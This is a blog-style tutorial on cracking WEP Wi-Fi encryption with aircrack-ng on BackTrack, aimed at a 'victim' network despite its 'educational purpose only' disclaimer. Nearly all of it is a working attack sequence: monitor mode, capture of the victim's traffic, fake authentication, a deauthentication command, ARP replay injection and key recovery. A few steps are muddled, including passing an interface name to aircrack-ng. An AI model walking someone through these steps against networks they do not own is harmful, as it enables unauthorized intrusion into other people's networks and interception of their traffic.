Hacking Wep / Wifi Connection

THIS IS FOR EDUCATIONAL PURPOSE ONLY !!!! 

You will need download Virtualbox (download link is below)
https://www.virtualbox.org/
Once installed you will need to download backtrack 5 r2 (download link is below)
http://www.backtrack-linux.org/downloads/

Now, after you have installed backtrack 5 r2 inside virtualbox, follow this tutorial below.(by the way the username and password for backtrack is root/toor)

Okay open up a terminal and type;

airmon-ng <---now you should see the interface saying wlan0 or wlan1...if you do not see the interface, please make sure that your usb wifi adapter is accepted or turned on.Now if you see the interface please continue.

airmon-ng start wlan0

airodump-ng wlan0 <-----if this doesnt work for you, please try airodump-ng mon0

Now you should be seeing other bssid,essid,channels and ENC. Now this tutorial will only go after WEP ENC.

Now after you have picked the WEP you want, hold ctrl and press c.

Now copy the bssid number from the WEP and open another terminal keeping the other terminal open.

airodump-ng -w test -c 1 --bssid 11:22:33:44:55 mon0
now in your terminal it will be different
airodump-ng -w (the file name you wanna call) -c (the channel number of not your own but wifi victim ) --bssid (not your bssid number but your victim that i asked to be copied, so you should only need to paste it) mon0

Now another tip. If you started this whole tutorial with wlan0 being on then continue with wlan0 at the end of every command but if you turned mon0 on like i did..then continue with mon0 at the end of every command.

Now you should see you your victim name in the essid, victims bssid, data etc. Now you should wait a couple of seconds for the victim station to popup below ..it will pop up with the same bssid number but with a station number as well. Now open another terminal keeping the this one open and type

aireplay-ng -1 0 -a 11:22:33:44:55 mon0 \

instead of the 11:22:33:44:55 , put the victims bssid. Now you should see 'sending authentication request' and at the end you should get 'association successful'. Now if you dont get an error or 'please specify essid, then do this command below;

aireplay-ng -0 5 -c (station of you victim) -a (bssid of you victim) mon0 (this command is for getting a handshake agreement with the but i believe it works with wep as well.


Now once again, open up and another terminal (leaving this open)and type;

aireplay-ng -3 -b 11:22:33:44:55 mon0
Once again the bssid should be different in yours. Now go back to your 2nd terminal (that had victims essid,bssid,data etc) now you should be seeing that your victim is receiving more data..wait to it get about 10 000 data +..i recommend 30 000 .. open another terminal and type

aircrack-ng test-01.cap mon0
and you should get the password...the test-01.cap is because i called the file test..so if you cant remember what you called the file..just type dir and you should see it but if you do remember just add -01.cap to the end of file. (example is shown above) 

=D Njoy ! 

Comments

Popular Posts